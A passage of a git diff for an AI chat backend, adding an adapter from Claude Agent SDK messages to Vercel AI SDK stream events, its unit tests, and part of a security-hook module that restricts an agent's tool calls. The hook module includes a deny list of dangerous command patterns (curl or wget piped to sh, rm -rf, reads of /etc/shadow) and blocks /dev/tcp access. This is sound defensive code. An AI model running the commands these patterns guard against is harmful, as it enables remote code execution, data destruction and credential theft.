output = first_item.get("text", "") if isinstance(first_item, dict) else ""
|
||||||
|
else:
|
||||||
|
output = ""
|
||||||
|
is_error = result.get("isError", False)
|
||||||
|
return output, is_error
|
||||||
|
except Exception as e:
|
||||||
|
return f"Error: {str(e)}", True
|
||||||
@@ -0,0 +1,198 @@
|
|||||||
|
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
|
||||||
|
|
||||||
|
This module provides the adapter layer that converts streaming messages from
|
||||||
|
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
|
||||||
|
the frontend expects.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import uuid
|
||||||
|
|
||||||
|
from claude_agent_sdk import (
|
||||||
|
AssistantMessage,
|
||||||
|
Message,
|
||||||
|
ResultMessage,
|
||||||
|
SystemMessage,
|
||||||
|
TextBlock,
|
||||||
|
ToolResultBlock,
|
||||||
|
ToolUseBlock,
|
||||||
|
UserMessage,
|
||||||
|
)
|
||||||
|
|
||||||
|
from backend.api.features.chat.response_model import (
|
||||||
|
StreamBaseResponse,
|
||||||
|
StreamError,
|
||||||
|
StreamFinish,
|
||||||
|
StreamFinishStep,
|
||||||
|
StreamStart,
|
||||||
|
StreamStartStep,
|
||||||
|
StreamTextDelta,
|
||||||
|
StreamTextEnd,
|
||||||
|
StreamTextStart,
|
||||||
|
StreamToolInputAvailable,
|
||||||
|
StreamToolInputStart,
|
||||||
|
StreamToolOutputAvailable,
|
||||||
|
)
|
||||||
|
from backend.api.features.chat.sdk.tool_adapter import (
|
||||||
|
MCP_TOOL_PREFIX,
|
||||||
|
pop_pending_tool_output,
|
||||||
|
)
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class SDKResponseAdapter:
|
||||||
|
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
|
||||||
|
|
||||||
|
This class maintains state during a streaming session to properly track
|
||||||
|
text blocks, tool calls, and message lifecycle.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, message_id: str | None = None):
|
||||||
|
self.message_id = message_id or str(uuid.uuid4())
|
||||||
|
self.text_block_id = str(uuid.uuid4())
|
||||||
|
self.has_started_text = False
|
||||||
|
self.has_ended_text = False
|
||||||
|
self.current_tool_calls: dict[str, dict[str, str]] = {}
|
||||||
|
self.task_id: str | None = None
|
||||||
|
self.step_open = False
|
||||||
|
|
||||||
|
def set_task_id(self, task_id: str) -> None:
|
||||||
|
"""Set the task ID for reconnection support."""
|
||||||
|
self.task_id = task_id
|
||||||
|
|
||||||
|
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
|
||||||
|
"""Convert a single SDK message to Vercel AI SDK format."""
|
||||||
|
responses: list[StreamBaseResponse] = []
|
||||||
|
|
||||||
|
if isinstance(sdk_message, SystemMessage):
|
||||||
|
if sdk_message.subtype == "init":
|
||||||
|
responses.append(
|
||||||
|
StreamStart(messageId=self.message_id, taskId=self.task_id)
|
||||||
|
)
|
||||||
|
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
|
||||||
|
responses.append(StreamStartStep())
|
||||||
|
self.step_open = True
|
||||||
|
|
||||||
|
elif isinstance(sdk_message, AssistantMessage):
|
||||||
|
# After tool results, the SDK sends a new AssistantMessage for the
|
||||||
|
# next LLM turn. Open a new step if the previous one was closed.
|
||||||
|
if not self.step_open:
|
||||||
|
responses.append(StreamStartStep())
|
||||||
|
self.step_open = True
|
||||||
|
|
||||||
|
for block in sdk_message.content:
|
||||||
|
if isinstance(block, TextBlock):
|
||||||
|
if block.text:
|
||||||
|
self._ensure_text_started(responses)
|
||||||
|
responses.append(
|
||||||
|
StreamTextDelta(id=self.text_block_id, delta=block.text)
|
||||||
|
)
|
||||||
|
|
||||||
|
elif isinstance(block, ToolUseBlock):
|
||||||
|
self._end_text_if_open(responses)
|
||||||
|
|
||||||
|
# Strip MCP prefix so frontend sees "find_block"
|
||||||
|
# instead of "mcp__copilot__find_block".
|
||||||
|
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
|
||||||
|
|
||||||
|
responses.append(
|
||||||
|
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
|
||||||
|
)
|
||||||
|
responses.append(
|
||||||
|
StreamToolInputAvailable(
|
||||||
|
toolCallId=block.id,
|
||||||
|
toolName=tool_name,
|
||||||
|
input=block.input,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
self.current_tool_calls[block.id] = {"name": tool_name}
|
||||||
|
|
||||||
|
elif isinstance(sdk_message, UserMessage):
|
||||||
|
# UserMessage carries tool results back from tool execution.
|
||||||
|
content = sdk_message.content
|
||||||
|
blocks = content if isinstance(content, list) else []
|
||||||
|
for block in blocks:
|
||||||
|
if isinstance(block, ToolResultBlock) and block.tool_use_id:
|
||||||
|
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
|
||||||
|
tool_name = tool_info.get("name", "unknown")
|
||||||
|
|
||||||
|
# Prefer the stashed full output over the SDK's
|
||||||
|
# (potentially truncated) ToolResultBlock content.
|
||||||
|
# The SDK truncates large results, writing them to disk,
|
||||||
|
# which breaks frontend widget parsing.
|
||||||
|
output = pop_pending_tool_output(tool_name) or (
|
||||||
|
_extract_tool_output(block.content)
|
||||||
|
)
|
||||||
|
|
||||||
|
responses.append(
|
||||||
|
StreamToolOutputAvailable(
|
||||||
|
toolCallId=block.tool_use_id,
|
||||||
|
toolName=tool_name,
|
||||||
|
output=output,
|
||||||
|
success=not (block.is_error or False),
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
|
# Close the current step after tool results — the next
|
||||||
|
# AssistantMessage will open a new step for the continuation.
|
||||||
|
if self.step_open:
|
||||||
|
responses.append(StreamFinishStep())
|
||||||
|
self.step_open = False
|
||||||
|
|
||||||
|
elif isinstance(sdk_message, ResultMessage):
|
||||||
|
self._end_text_if_open(responses)
|
||||||
|
# Close the step before finishing.
|
||||||
|
if self.step_open:
|
||||||
|
responses.append(StreamFinishStep())
|
||||||
|
self.step_open = False
|
||||||
|
|
||||||
|
if sdk_message.subtype == "success":
|
||||||
|
responses.append(StreamFinish())
|
||||||
|
elif sdk_message.subtype in ("error", "error_during_execution"):
|
||||||
|
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
|
||||||
|
responses.append(
|
||||||
|
StreamError(errorText=str(error_msg), code="sdk_error")
|
||||||
|
)
|
||||||
|
responses.append(StreamFinish())
|
||||||
|
|
||||||
|
else:
|
||||||
|
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
|
||||||
|
|
||||||
|
return responses
|
||||||
|
|
||||||
|
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
|
||||||
|
"""Start (or restart) a text block if needed."""
|
||||||
|
if not self.has_started_text or self.has_ended_text:
|
||||||
|
if self.has_ended_text:
|
||||||
|
self.text_block_id = str(uuid.uuid4())
|
||||||
|
self.has_ended_text = False
|
||||||
|
responses.append(StreamTextStart(id=self.text_block_id))
|
||||||
|
self.has_started_text = True
|
||||||
|
|
||||||
|
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
|
||||||
|
"""End the current text block if one is open."""
|
||||||
|
if self.has_started_text and not self.has_ended_text:
|
||||||
|
responses.append(StreamTextEnd(id=self.text_block_id))
|
||||||
|
self.has_ended_text = True
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
|
||||||
|
"""Extract a string output from a ToolResultBlock's content field."""
|
||||||
|
if isinstance(content, str):
|
||||||
|
return content
|
||||||
|
if isinstance(content, list):
|
||||||
|
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
|
||||||
|
if parts:
|
||||||
|
return "".join(parts)
|
||||||
|
try:
|
||||||
|
return json.dumps(content)
|
||||||
|
except (TypeError, ValueError):
|
||||||
|
return str(content)
|
||||||
|
if content is None:
|
||||||
|
return ""
|
||||||
|
try:
|
||||||
|
return json.dumps(content)
|
||||||
|
except (TypeError, ValueError):
|
||||||
|
return str(content)
|
||||||
@@ -0,0 +1,366 @@
|
|||||||
|
"""Unit tests for the SDK response adapter."""
|
||||||
|
|
||||||
|
from claude_agent_sdk import (
|
||||||
|
AssistantMessage,
|
||||||
|
ResultMessage,
|
||||||
|
SystemMessage,
|
||||||
|
TextBlock,
|
||||||
|
ToolResultBlock,
|
||||||
|
ToolUseBlock,
|
||||||
|
UserMessage,
|
||||||
|
)
|
||||||
|
|
||||||
|
from backend.api.features.chat.response_model import (
|
||||||
|
StreamBaseResponse,
|
||||||
|
StreamError,
|
||||||
|
StreamFinish,
|
||||||
|
StreamFinishStep,
|
||||||
|
StreamStart,
|
||||||
|
StreamStartStep,
|
||||||
|
StreamTextDelta,
|
||||||
|
StreamTextEnd,
|
||||||
|
StreamTextStart,
|
||||||
|
StreamToolInputAvailable,
|
||||||
|
StreamToolInputStart,
|
||||||
|
StreamToolOutputAvailable,
|
||||||
|
)
|
||||||
|
|
||||||
|
from .response_adapter import SDKResponseAdapter
|
||||||
|
from .tool_adapter import MCP_TOOL_PREFIX
|
||||||
|
|
||||||
|
|
||||||
|
def _adapter() -> SDKResponseAdapter:
|
||||||
|
a = SDKResponseAdapter(message_id="msg-1")
|
||||||
|
a.set_task_id("task-1")
|
||||||
|
return a
|
||||||
|
|
||||||
|
|
||||||
|
# -- SystemMessage -----------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_system_init_emits_start_and_step():
|
||||||
|
adapter = _adapter()
|
||||||
|
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
|
||||||
|
assert len(results) == 2
|
||||||
|
assert isinstance(results[0], StreamStart)
|
||||||
|
assert results[0].messageId == "msg-1"
|
||||||
|
assert results[0].taskId == "task-1"
|
||||||
|
assert isinstance(results[1], StreamStartStep)
|
||||||
|
|
||||||
|
|
||||||
|
def test_system_non_init_emits_nothing():
|
||||||
|
adapter = _adapter()
|
||||||
|
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
|
||||||
|
assert results == []
|
||||||
|
|
||||||
|
|
||||||
|
# -- AssistantMessage with TextBlock -----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_text_block_emits_step_start_and_delta():
|
||||||
|
adapter = _adapter()
|
||||||
|
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
|
||||||
|
results = adapter.convert_message(msg)
|
||||||
|
assert len(results) == 3
|
||||||
|
assert isinstance(results[0], StreamStartStep)
|
||||||
|
assert isinstance(results[1], StreamTextStart)
|
||||||
|
assert isinstance(results[2], StreamTextDelta)
|
||||||
|
assert results[2].delta == "hello"
|
||||||
|
|
||||||
|
|
||||||
|
def test_empty_text_block_emits_only_step():
|
||||||
|
adapter = _adapter()
|
||||||
|
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
|
||||||
|
results = adapter.convert_message(msg)
|
||||||
|
# Empty text skipped, but step still opens
|
||||||
|
assert len(results) == 1
|
||||||
|
assert isinstance(results[0], StreamStartStep)
|
||||||
|
|
||||||
|
|
||||||
|
def test_multiple_text_deltas_reuse_block_id():
|
||||||
|
adapter = _adapter()
|
||||||
|
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
|
||||||
|
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
|
||||||
|
r1 = adapter.convert_message(msg1)
|
||||||
|
r2 = adapter.convert_message(msg2)
|
||||||
|
# First gets step+start+delta, second only delta (block & step already started)
|
||||||
|
assert len(r1) == 3
|
||||||
|
assert isinstance(r1[0], StreamStartStep)
|
||||||
|
assert isinstance(r1[1], StreamTextStart)
|
||||||
|
assert len(r2) == 1
|
||||||
|
assert isinstance(r2[0], StreamTextDelta)
|
||||||
|
assert r1[1].id == r2[0].id # same block ID
|
||||||
|
|
||||||
|
|
||||||
|
# -- AssistantMessage with ToolUseBlock --------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_tool_use_emits_input_start_and_available():
|
||||||
|
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
|
||||||
|
adapter = _adapter()
|
||||||
|
msg = AssistantMessage(
|
||||||
|
content=[
|
||||||
|
ToolUseBlock(
|
||||||
|
id="tool-1",
|
||||||
|
name=f"{MCP_TOOL_PREFIX}find_agent",
|
||||||
|
input={"q": "x"},
|
||||||
|
)
|
||||||
|
],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(msg)
|
||||||
|
assert len(results) == 3
|
||||||
|
assert isinstance(results[0], StreamStartStep)
|
||||||
|
assert isinstance(results[1], StreamToolInputStart)
|
||||||
|
assert results[1].toolCallId == "tool-1"
|
||||||
|
assert results[1].toolName == "find_agent" # prefix stripped
|
||||||
|
assert isinstance(results[2], StreamToolInputAvailable)
|
||||||
|
assert results[2].toolName == "find_agent" # prefix stripped
|
||||||
|
assert results[2].input == {"q": "x"}
|
||||||
|
|
||||||
|
|
||||||
|
def test_text_then_tool_ends_text_block():
|
||||||
|
adapter = _adapter()
|
||||||
|
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
|
||||||
|
tool_msg = AssistantMessage(
|
||||||
|
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
adapter.convert_message(text_msg) # opens step + text
|
||||||
|
results = adapter.convert_message(tool_msg)
|
||||||
|
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
|
||||||
|
assert len(results) == 3
|
||||||
|
assert isinstance(results[0], StreamTextEnd)
|
||||||
|
assert isinstance(results[1], StreamToolInputStart)
|
||||||
|
|
||||||
|
|
||||||
|
# -- UserMessage with ToolResultBlock ----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_tool_result_emits_output_and_finish_step():
|
||||||
|
adapter = _adapter()
|
||||||
|
# First register the tool call (opens step) — SDK sends prefixed name
|
||||||
|
tool_msg = AssistantMessage(
|
||||||
|
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
adapter.convert_message(tool_msg)
|
||||||
|
|
||||||
|
# Now send tool result
|
||||||
|
result_msg = UserMessage(
|
||||||
|
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(result_msg)
|
||||||
|
assert len(results) == 2
|
||||||
|
assert isinstance(results[0], StreamToolOutputAvailable)
|
||||||
|
assert results[0].toolCallId == "t1"
|
||||||
|
assert results[0].toolName == "find_agent" # prefix stripped
|
||||||
|
assert results[0].output == "found 3 agents"
|
||||||
|
assert results[0].success is True
|
||||||
|
assert isinstance(results[1], StreamFinishStep)
|
||||||
|
|
||||||
|
|
||||||
|
def test_tool_result_error():
|
||||||
|
adapter = _adapter()
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(
|
||||||
|
content=[
|
||||||
|
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
|
||||||
|
],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
)
|
||||||
|
result_msg = UserMessage(
|
||||||
|
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(result_msg)
|
||||||
|
assert isinstance(results[0], StreamToolOutputAvailable)
|
||||||
|
assert results[0].success is False
|
||||||
|
assert isinstance(results[1], StreamFinishStep)
|
||||||
|
|
||||||
|
|
||||||
|
def test_tool_result_list_content():
|
||||||
|
adapter = _adapter()
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(
|
||||||
|
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
)
|
||||||
|
result_msg = UserMessage(
|
||||||
|
content=[
|
||||||
|
ToolResultBlock(
|
||||||
|
tool_use_id="t1",
|
||||||
|
content=[
|
||||||
|
{"type": "text", "text": "line1"},
|
||||||
|
{"type": "text", "text": "line2"},
|
||||||
|
],
|
||||||
|
)
|
||||||
|
]
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(result_msg)
|
||||||
|
assert isinstance(results[0], StreamToolOutputAvailable)
|
||||||
|
assert results[0].output == "line1line2"
|
||||||
|
assert isinstance(results[1], StreamFinishStep)
|
||||||
|
|
||||||
|
|
||||||
|
def test_string_user_message_ignored():
|
||||||
|
"""A plain string UserMessage (not tool results) produces no output."""
|
||||||
|
adapter = _adapter()
|
||||||
|
results = adapter.convert_message(UserMessage(content="hello"))
|
||||||
|
assert results == []
|
||||||
|
|
||||||
|
|
||||||
|
# -- ResultMessage -----------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_result_success_emits_finish_step_and_finish():
|
||||||
|
adapter = _adapter()
|
||||||
|
# Start some text first (opens step)
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(content=[TextBlock(text="done")], model="test")
|
||||||
|
)
|
||||||
|
msg = ResultMessage(
|
||||||
|
subtype="success",
|
||||||
|
duration_ms=100,
|
||||||
|
duration_api_ms=50,
|
||||||
|
is_error=False,
|
||||||
|
num_turns=1,
|
||||||
|
session_id="s1",
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(msg)
|
||||||
|
# TextEnd + FinishStep + StreamFinish
|
||||||
|
assert len(results) == 3
|
||||||
|
assert isinstance(results[0], StreamTextEnd)
|
||||||
|
assert isinstance(results[1], StreamFinishStep)
|
||||||
|
assert isinstance(results[2], StreamFinish)
|
||||||
|
|
||||||
|
|
||||||
|
def test_result_error_emits_error_and_finish():
|
||||||
|
adapter = _adapter()
|
||||||
|
msg = ResultMessage(
|
||||||
|
subtype="error",
|
||||||
|
duration_ms=100,
|
||||||
|
duration_api_ms=50,
|
||||||
|
is_error=True,
|
||||||
|
num_turns=0,
|
||||||
|
session_id="s1",
|
||||||
|
result="API rate limited",
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(msg)
|
||||||
|
# No step was open, so no FinishStep — just Error + Finish
|
||||||
|
assert len(results) == 2
|
||||||
|
assert isinstance(results[0], StreamError)
|
||||||
|
assert "API rate limited" in results[0].errorText
|
||||||
|
assert isinstance(results[1], StreamFinish)
|
||||||
|
|
||||||
|
|
||||||
|
# -- Text after tools (new block ID) ----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_text_after_tool_gets_new_block_id():
|
||||||
|
adapter = _adapter()
|
||||||
|
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(content=[TextBlock(text="before")], model="test")
|
||||||
|
)
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(
|
||||||
|
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
)
|
||||||
|
# Send tool result (closes step)
|
||||||
|
adapter.convert_message(
|
||||||
|
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
|
||||||
|
)
|
||||||
|
results = adapter.convert_message(
|
||||||
|
AssistantMessage(content=[TextBlock(text="after")], model="test")
|
||||||
|
)
|
||||||
|
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
|
||||||
|
assert len(results) == 3
|
||||||
|
assert isinstance(results[0], StreamStartStep)
|
||||||
|
assert isinstance(results[1], StreamTextStart)
|
||||||
|
assert isinstance(results[2], StreamTextDelta)
|
||||||
|
assert results[2].delta == "after"
|
||||||
|
|
||||||
|
|
||||||
|
# -- Full conversation flow --------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_full_conversation_flow():
|
||||||
|
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
|
||||||
|
adapter = _adapter()
|
||||||
|
all_responses: list[StreamBaseResponse] = []
|
||||||
|
|
||||||
|
# 1. Init
|
||||||
|
all_responses.extend(
|
||||||
|
adapter.convert_message(SystemMessage(subtype="init", data={}))
|
||||||
|
)
|
||||||
|
# 2. Assistant text
|
||||||
|
all_responses.extend(
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
|
||||||
|
)
|
||||||
|
)
|
||||||
|
# 3. Tool use
|
||||||
|
all_responses.extend(
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(
|
||||||
|
content=[
|
||||||
|
ToolUseBlock(
|
||||||
|
id="t1",
|
||||||
|
name=f"{MCP_TOOL_PREFIX}find_agent",
|
||||||
|
input={"query": "email"},
|
||||||
|
)
|
||||||
|
],
|
||||||
|
model="test",
|
||||||
|
)
|
||||||
|
)
|
||||||
|
)
|
||||||
|
# 4. Tool result
|
||||||
|
all_responses.extend(
|
||||||
|
adapter.convert_message(
|
||||||
|
UserMessage(
|
||||||
|
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
|
||||||
|
)
|
||||||
|
)
|
||||||
|
)
|
||||||
|
# 5. More text
|
||||||
|
all_responses.extend(
|
||||||
|
adapter.convert_message(
|
||||||
|
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
|
||||||
|
)
|
||||||
|
)
|
||||||
|
# 6. Result
|
||||||
|
all_responses.extend(
|
||||||
|
adapter.convert_message(
|
||||||
|
ResultMessage(
|
||||||
|
subtype="success",
|
||||||
|
duration_ms=500,
|
||||||
|
duration_api_ms=400,
|
||||||
|
is_error=False,
|
||||||
|
num_turns=2,
|
||||||
|
session_id="s1",
|
||||||
|
)
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
|
types = [type(r).__name__ for r in all_responses]
|
||||||
|
assert types == [
|
||||||
|
"StreamStart",
|
||||||
|
"StreamStartStep", # step 1: text + tool call
|
||||||
|
"StreamTextStart",
|
||||||
|
"StreamTextDelta", # "Let me search"
|
||||||
|
"StreamTextEnd", # closed before tool
|
||||||
|
"StreamToolInputStart",
|
||||||
|
"StreamToolInputAvailable",
|
||||||
|
"StreamToolOutputAvailable", # tool result
|
||||||
|
"StreamFinishStep", # step 1 closed after tool result
|
||||||
|
"StreamStartStep", # step 2: continuation text
|
||||||
|
"StreamTextStart", # new block after tool
|
||||||
|
"StreamTextDelta", # "I found 2"
|
||||||
|
"StreamTextEnd", # closed by result
|
||||||
|
"StreamFinishStep", # step 2 closed
|
||||||
|
"StreamFinish",
|
||||||
|
]
|
||||||
@@ -0,0 +1,393 @@
|
|||||||
|
"""Security hooks for Claude Agent SDK integration.
|
||||||
|
|
||||||
|
This module provides security hooks that validate tool calls before execution,
|
||||||
|
ensuring multi-user isolation and preventing unauthorized operations.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import shlex
|
||||||
|
from typing import Any, cast
|
||||||
|
|
||||||
|
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Tools that are blocked entirely (CLI/system access)
|
||||||
|
BLOCKED_TOOLS = {
|
||||||
|
"bash",
|
||||||
|
"shell",
|
||||||
|
"exec",
|
||||||
|
"terminal",
|
||||||
|
"command",
|
||||||
|
}
|
||||||
|
|
||||||
|
# Safe read-only commands allowed in the sandboxed Bash tool.
|
||||||
|
# These are data-processing / inspection utilities — no writes, no network.
|
||||||
|
ALLOWED_BASH_COMMANDS = {
|
||||||
|
# JSON / structured data
|
||||||
|
"jq",
|
||||||
|
# Text processing
|
||||||
|
"grep",
|
||||||
|
"egrep",
|
||||||
|
"fgrep",
|
||||||
|
"rg",
|
||||||
|
"head",
|
||||||
|
"tail",
|
||||||
|
"cat",
|
||||||
|
"wc",
|
||||||
|
"sort",
|
||||||
|
"uniq",
|
||||||
|
"cut",
|
||||||
|
"tr",
|
||||||
|
"sed",
|
||||||
|
"awk",
|
||||||
|
"column",
|
||||||
|
"fold",
|
||||||
|
"fmt",
|
||||||
|
"nl",
|
||||||
|
"paste",
|
||||||
|
"rev",
|
||||||
|
# File inspection (read-only)
|
||||||
|
"find",
|
||||||
|
"ls",
|
||||||
|
"file",
|
||||||
|
"stat",
|
||||||
|
"du",
|
||||||
|
"tree",
|
||||||
|
"basename",
|
||||||
|
"dirname",
|
||||||
|
"realpath",
|
||||||
|
# Utilities
|
||||||
|
"echo",
|
||||||
|
"printf",
|
||||||
|
"date",
|
||||||
|
"true",
|
||||||
|
"false",
|
||||||
|
"xargs",
|
||||||
|
"tee",
|
||||||
|
# Comparison / encoding
|
||||||
|
"diff",
|
||||||
|
"comm",
|
||||||
|
"base64",
|
||||||
|
"md5sum",
|
||||||
|
"sha256sum",
|
||||||
|
}
|
||||||
|
|
||||||
|
# Tools allowed only when their path argument stays within the SDK workspace.
|
||||||
|
# The SDK uses these to handle oversized tool results (writes to tool-results/
|
||||||
|
# files, then reads them back) and for workspace file operations.
|
||||||
|
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
|
||||||
|
|
||||||
|
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
|
||||||
|
SANDBOXED_BASH_TOOLS = {"Bash"}
|
||||||
|
|
||||||
|
# Dangerous patterns in tool inputs
|
||||||
|
DANGEROUS_PATTERNS = [
|
||||||
|
r"sudo",
|
||||||
|
r"rm\s+-rf",
|
||||||
|
r"dd\s+if=",
|
||||||
|
r"/etc/passwd",
|
||||||
|
r"/etc/shadow",
|
||||||
|
r"chmod\s+777",
|
||||||
|
r"curl\s+.*\|.*sh",
|
||||||
|
r"wget\s+.*\|.*sh",
|
||||||
|
r"eval\s*\(",
|
||||||
|
r"exec\s*\(",
|
||||||
|
r"__import__",
|
||||||
|
r"os\.system",
|
||||||
|
r"subprocess",
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
def _deny(reason: str) -> dict[str, Any]:
|
||||||
|
"""Return a hook denial response."""
|
||||||
|
return {
|
||||||
|
"hookSpecificOutput": {
|
||||||
|
"hookEventName": "PreToolUse",
|
||||||
|
"permissionDecision": "deny",
|
||||||
|
"permissionDecisionReason": reason,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_workspace_path(
|
||||||
|
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
"""Validate that a workspace-scoped tool only accesses allowed paths.
|
||||||
|
|
||||||
|
Allowed directories:
|
||||||
|
- The SDK working directory (``/tmp/copilot-<session>/``)
|
||||||
|
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
|
||||||
|
"""
|
||||||
|
path = tool_input.get("file_path") or tool_input.get("path") or ""
|
||||||
|
if not path:
|
||||||
|
# Glob/Grep without a path default to cwd which is already sandboxed
|
||||||
|
return {}
|
||||||
|
|
||||||
|
resolved = os.path.normpath(os.path.expanduser(path))
|
||||||
|
|
||||||
|
# Allow access within the SDK working directory
|
||||||
|
if sdk_cwd:
|
||||||
|
norm_cwd = os.path.normpath(sdk_cwd)
|
||||||
|
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
|
||||||
|
return {}
|
||||||
|
|
||||||
|
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
|
||||||
|
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
|
||||||
|
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
|
||||||
|
return {}
|
||||||
|
|
||||||
|
logger.warning(
|
||||||
|
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
|
||||||
|
)
|
||||||
|
return _deny(
|
||||||
|
f"Tool '{tool_name}' can only access files within the workspace directory."
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_bash_command(
|
||||||
|
tool_input: dict[str, Any], sdk_cwd: str | None
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
"""Validate a Bash command against the allowlist of safe commands.
|
||||||
|
|
||||||
|
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
|
||||||
|
Blocks command substitution, output redirection, and disallowed executables.
|
||||||
|
|
||||||
|
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
|
||||||
|
containing ``|`` won't be mistaken for shell pipes).
|
||||||
|
"""
|
||||||
|
command = tool_input.get("command", "")
|
||||||
|
if not command or not isinstance(command, str):
|
||||||
|
return _deny("Bash command is empty.")
|
||||||
|
|
||||||
|
# Block command substitution — can smuggle arbitrary commands
|
||||||
|
if "$(" in command or "`" in command:
|
||||||
|
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
|
||||||
|
|
||||||
|
# Block output redirection — Bash should be read-only
|
||||||
|
if re.search(r"(?<!\d)>{1,2}\s", command):
|
||||||
|
return _deny("Output redirection (> or >>) is not allowed in Bash.")
|
||||||
|
|
||||||
|
# Block /dev/ access (e.g., /dev/tcp for network)
|
||||||
|
if "/dev/" in command:
|
||||||
|
return _deny("Access to /dev/ is not allowed in Bash.")
|
||||||
|
|
||||||
|
# Tokenize with shlex (respects quotes), then extract command names.
|
||||||
|
# shlex preserves shell operators like | ; && || as separate tokens.
|
||||||
|
try:
|
||||||
|
tokens = shlex.split(command)
|
||||||
|
except ValueError:
|
||||||
|
return _deny("Malformed command (unmatched quotes).")
|
||||||
|
|
||||||
|
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
|
||||||
|
expect_command = True
|
||||||
|
for token in tokens:
|
||||||
|
if token in ("|", "||", "&&", ";"):
|
||||||
|
expect_command = True
|
||||||
|
continue
|
||||||
|
if expect_command:
|
||||||
|
